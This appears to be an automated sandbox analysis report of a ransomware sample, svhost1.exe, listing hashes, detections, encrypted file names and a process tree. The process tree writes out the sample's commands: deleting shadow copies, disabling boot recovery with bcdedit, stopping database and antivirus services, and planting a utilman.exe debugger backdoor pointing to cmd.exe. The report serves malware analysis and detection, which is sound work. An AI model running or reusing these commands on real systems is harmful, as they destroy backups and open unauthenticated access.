Analysis
-
max time kernel
66s -
max time network
48s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
09-05-2020 18:48
Static task
static1
Behavioral task
behavioral1
Sample
svhost1.exe
Resource
win7v200430
Behavioral task
behavioral2
Sample
svhost1.exe
Resource
win10v200430
General
-
Target
svhost1.exe
-
Size
2.8MB
-
MD5
0527539f8c9af38ea8c36e9d2be595cd
-
SHA1
a9d38a3b10c1d3dbf5eb00024303877e3c84cdab
-
SHA256
247ddce4c369810b27385acb97298a107ac440b70d23f047e20224dd6e68e536
-
SHA512
00e01f1668c09f98643312e15044a8dc4ef38b72bb08106bd967af6f130ebaca8899e3bf22b143db49a0daf42db690b8890d10e3455804e817647e6f977242c4
Malware Config
Signatures
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of WriteProcessMemory 94 IoCs
Processes:
svhost1.exepowershell.exepowershell.exedescription pid process target process PID 664 wrote to memory of 868 664 svhost1.exe powershell.exe PID 664 wrote to memory of 868 664 svhost1.exe powershell.exe PID 868 wrote to memory of 1080 868 powershell.exe net.exe PID 868 wrote to memory of 1080 868 powershell.exe net.exe PID 664 wrote to memory of 2092 664 svhost1.exe powershell.exe PID 664 wrote to memory of 2092 664 svhost1.exe powershell.exe PID 2092 wrote to memory of 3712 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3712 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3180 2092 powershell.exe vssadmin.exe PID 2092 wrote to memory of 3180 2092 powershell.exe vssadmin.exe PID 2092 wrote to memory of 1872 2092 powershell.exe reg.exe PID 2092 wrote to memory of 1872 2092 powershell.exe reg.exe PID 2092 wrote to memory of 1912 2092 powershell.exe reg.exe PID 2092 wrote to memory of 1912 2092 powershell.exe reg.exe PID 2092 wrote to memory of 3528 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3528 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3328 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3328 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 2272 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 2272 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 496 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 496 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3648 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3648 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3800 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3800 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 1080 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 1080 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 2860 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 2860 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 732 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 732 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 2108 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 2108 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3552 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3552 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 276 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 276 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3888 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3888 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3540 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3540 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 1836 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 1836 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 2252 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 2252 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3052 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3052 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 508 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 508 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3996 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3996 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3992 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 3992 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 2220 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 2220 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 992 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 992 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 1060 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 1060 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 1800 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 1800 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 1008 2092 powershell.exe WMIC.exe PID 2092 wrote to memory of 1008 2092 powershell.exe WMIC.exe -
Runs net.exe
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3180 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 868 powershell.exe 868 powershell.exe 868 powershell.exe 2092 powershell.exe 2092 powershell.exe 2092 powershell.exe -
Sets file execution options in registry 2 TTPs 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "%windir%\\system32\\cmd.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "Hotkey Disabled" reg.exe -
Drops desktop.ini file(s) 3 IoCs
Processes:
svhost1.exedescription ioc process File opened for modification C:\Program Files\desktop.ini svhost1.exe File opened for modification C:\Program Files (x86)\desktop.ini svhost1.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-1231583446-2617009595-2137880041-1000\desktop.ini svhost1.exe -
Suspicious use of AdjustPrivilegeToken 1643 IoCs
Processes:
powershell.exepowershell.exeWMIC.exevssvc.exeWMIC.exedescription pid process Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeIncreaseQuotaPrivilege 3712 WMIC.exe Token: SeSecurityPrivilege 3712 WMIC.exe Token: SeTakeOwnershipPrivilege 3712 WMIC.exe Token: SeLoadDriverPrivilege 3712 WMIC.exe Token: SeSystemProfilePrivilege 3712 WMIC.exe Token: SeSystemtimePrivilege 3712 WMIC.exe Token: SeProfSingleProcessPrivilege 3712 WMIC.exe Token: SeIncBasePriorityPrivilege 3712 WMIC.exe Token: SeCreatePagefilePrivilege 3712 WMIC.exe Token: SeBackupPrivilege 3712 WMIC.exe Token: SeRestorePrivilege 3712 WMIC.exe Token: SeShutdownPrivilege 3712 WMIC.exe Token: SeDebugPrivilege 3712 WMIC.exe Token: SeSystemEnvironmentPrivilege 3712 WMIC.exe Token: SeRemoteShutdownPrivilege 3712 WMIC.exe Token: SeUndockPrivilege 3712 WMIC.exe Token: SeManageVolumePrivilege 3712 WMIC.exe Token: 33 3712 WMIC.exe Token: 34 3712 WMIC.exe Token: 35 3712 WMIC.exe Token: 36 3712 WMIC.exe Token: SeIncreaseQuotaPrivilege 3712 WMIC.exe Token: SeSecurityPrivilege 3712 WMIC.exe Token: SeTakeOwnershipPrivilege 3712 WMIC.exe Token: SeLoadDriverPrivilege 3712 WMIC.exe Token: SeSystemProfilePrivilege 3712 WMIC.exe Token: SeSystemtimePrivilege 3712 WMIC.exe Token: SeProfSingleProcessPrivilege 3712 WMIC.exe Token: SeIncBasePriorityPrivilege 3712 WMIC.exe Token: SeCreatePagefilePrivilege 3712 WMIC.exe Token: SeBackupPrivilege 3712 WMIC.exe Token: SeRestorePrivilege 3712 WMIC.exe Token: SeShutdownPrivilege 3712 WMIC.exe Token: SeDebugPrivilege 3712 WMIC.exe Token: SeSystemEnvironmentPrivilege 3712 WMIC.exe Token: SeRemoteShutdownPrivilege 3712 WMIC.exe Token: SeUndockPrivilege 3712 WMIC.exe Token: SeManageVolumePrivilege 3712 WMIC.exe Token: 33 3712 WMIC.exe Token: 34 3712 WMIC.exe Token: 35 3712 WMIC.exe Token: 36 3712 WMIC.exe Token: SeBackupPrivilege 3340 vssvc.exe Token: SeRestorePrivilege 3340 vssvc.exe Token: SeAuditPrivilege 3340 vssvc.exe Token: SeIncreaseQuotaPrivilege 3528 WMIC.exe Token: SeSecurityPrivilege 3528 WMIC.exe Token: SeTakeOwnershipPrivilege 3528 WMIC.exe Token: SeLoadDriverPrivilege 3528 WMIC.exe Token: SeSystemProfilePrivilege 3528 WMIC.exe Token: SeSystemtimePrivilege 3528 WMIC.exe Token: SeProfSingleProcessPrivilege 3528 WMIC.exe Token: SeIncBasePriorityPrivilege 3528 WMIC.exe Token: SeCreatePagefilePrivilege 3528 WMIC.exe Token: SeBackupPrivilege 3528 WMIC.exe Token: SeRestorePrivilege 3528 WMIC.exe Token: SeShutdownPrivilege 3528 WMIC.exe Token: SeDebugPrivilege 3528 WMIC.exe Token: SeSystemEnvironmentPrivilege 3528 WMIC.exe Token: SeRemoteShutdownPrivilege 3528 WMIC.exe Token: SeUndockPrivilege 3528 WMIC.exe Token: SeManageVolumePrivilege 3528 WMIC.exe -
Drops file in Windows directory 44 IoCs
Processes:
svhost1.exedescription ioc process File created C:\Windows\DtcInstall.log_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\setupact.log_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\win.ini_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\WindowsUpdate.log svhost1.exe File opened for modification C:\Windows\write.exe svhost1.exe File opened for modification C:\Windows\bfsvc.exe svhost1.exe File created C:\Windows\bootstat.dat_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\splwow64.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\twain_32.dll svhost1.exe File created C:\Windows\explorer.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\Professional.xml svhost1.exe File opened for modification C:\Windows\PFRO.log svhost1.exe File opened for modification C:\Windows\regedit.exe svhost1.exe File opened for modification C:\Windows\splwow64.exe svhost1.exe File created C:\Windows\HelpPane.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\lsasetup.log_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\winhlp32.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\WMSysPr9.prx svhost1.exe File opened for modification C:\Windows\lsasetup.log svhost1.exe File created C:\Windows\PFRO.log_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\explorer.exe svhost1.exe File opened for modification C:\Windows\notepad.exe svhost1.exe File created C:\Windows\WindowsUpdate.log_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\DtcInstall.log svhost1.exe File opened for modification C:\Windows\HelpPane.exe svhost1.exe File created C:\Windows\mib.bin_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\Professional.xml_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\win.ini svhost1.exe File opened for modification C:\Windows\WindowsShell.Manifest svhost1.exe File created C:\Windows\bfsvc.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\bootstat.dat svhost1.exe File created C:\Windows\notepad.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\setupact.log svhost1.exe File opened for modification C:\Windows\hh.exe svhost1.exe File opened for modification C:\Windows\mib.bin svhost1.exe File created C:\Windows\system.ini_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\system.ini svhost1.exe File created C:\Windows\twain_32.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\WindowsShell.Manifest_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Windows\winhlp32.exe svhost1.exe File created C:\Windows\WMSysPr9.prx_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\hh.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\regedit.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Windows\write.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe -
Discovers systems in the same network 1 TTPs 1 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 408 bcdedit.exe 1060 bcdedit.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe -
Drops file in Program Files directory 346 IoCs
Processes:
svhost1.exedescription ioc process File created C:\Program Files\CompleteSuspend.rtf_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\7-Zip\readme.txt_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\crashreporter.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\UnprotectUnblock.gif_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Internet Explorer\sqmapi.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\WATPCSP.dll svhost1.exe File created C:\Program Files\Windows Media Player\wmpshare.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe svhost1.exe File opened for modification C:\Program Files\Windows Defender\MpAzSubmit.dll svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-core-timezone-l1-1-0.dll svhost1.exe File created C:\Program Files\Windows Defender\MSASCuiL.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Windows Defender\MsMpLics.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\application.ini_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\IA2Marshal.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Microsoft Office\AppXManifest.xml_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\ieinstal.exe svhost1.exe File opened for modification C:\Program Files\7-Zip\7-zip32.dll svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-multibyte-l1-1-0.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\platform.ini_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\LockTest.nfo svhost1.exe File opened for modification C:\Program Files\Windows Media Player\WMPMediaSharing.dll svhost1.exe File opened for modification C:\Program Files\Windows Media Player\WMPNSSUI.dll svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-core-processthreads-l1-1-1.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Windows Defender\MpRtp.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Windows Defender\SymSrv.dll svhost1.exe File opened for modification C:\Program Files\7-Zip\Uninstall.exe svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-core-synch-l1-2-0.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\lgpllibs.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\libEGL.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe.sig svhost1.exe File created C:\Program Files\RedoImport.xla_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\AccessibleHandler.dll svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-time-l1-1-0.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\install.log_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\libGLESv2.dll svhost1.exe File opened for modification C:\Program Files\Windows Defender\MpSvc.dll svhost1.exe File opened for modification C:\Program Files\7-Zip\7-zip.dll svhost1.exe File created C:\Program Files\7-Zip\7z.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list svhost1.exe File created C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Windows Defender\MpUXSrv.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\install.log svhost1.exe File created C:\Program Files\Mozilla Firefox\plugin-container.exe.sig_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files (x86)\desktop.ini svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l1-2-0.dll svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-filesystem-l1-1-0.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\CompareHide.WTV_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Windows Defender\AmStatusInstall.mof svhost1.exe File created C:\Program Files\Windows Defender\MsMpEng.exe_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Internet Explorer\IEShims.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Windows Defender\ClientWMIInstall.mof svhost1.exe File created C:\Program Files\Windows Defender\ProtectionManagement.mof_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-heap-l1-1-0.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\d3dcompiler_47.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File created C:\Program Files\Mozilla Firefox\freebl3.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Windows Defender\MpCommu.dll svhost1.exe File opened for modification C:\Program Files\Windows Defender\NisLog.dll svhost1.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe svhost1.exe File created C:\Program Files\BackupProtect.kix_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\iexplore.exe svhost1.exe File created C:\Program Files\Windows Defender\EppManifest.dll_ID_625234068_[decryption@qbmail.biz].trix svhost1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\svhost1.exe"C:\Users\Admin\AppData\Local\Temp\svhost1.exe"1⤵
- Suspicious use of WriteProcessMemory
- Drops desktop.ini file(s)
- Drops file in Windows directory
- Drops file in Program Files directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoExit -Command -2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" view3⤵
- Discovers systems in the same network
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoExit -Command -2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe3⤵
- Sets file execution options in registry
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"3⤵
- Sets file execution options in registry
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%WinDefend%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%mr2kserv%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%IISADMIN%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Database%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QuickBooksDB%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MongoDB%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MBAMService%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Exchange%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%wsbexchange%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QB%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Quick%%'" call stopservice3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%QB%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftefd%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftesql%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%mysql%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%node%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%noderunner%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%omtsreco%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%oracle%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sql%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%store%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acess%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acrord%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%code%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%devenv%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%avp%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%swprv%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%VSSVC%%'" call terminate3⤵
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sqlsrvr%%'" call terminate3⤵
-
C:\Windows\system32\bcdedit.exe"C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exe"C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= bootstatuspolicy ignoreallfailures -inputFormat xml -outputFormat text3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service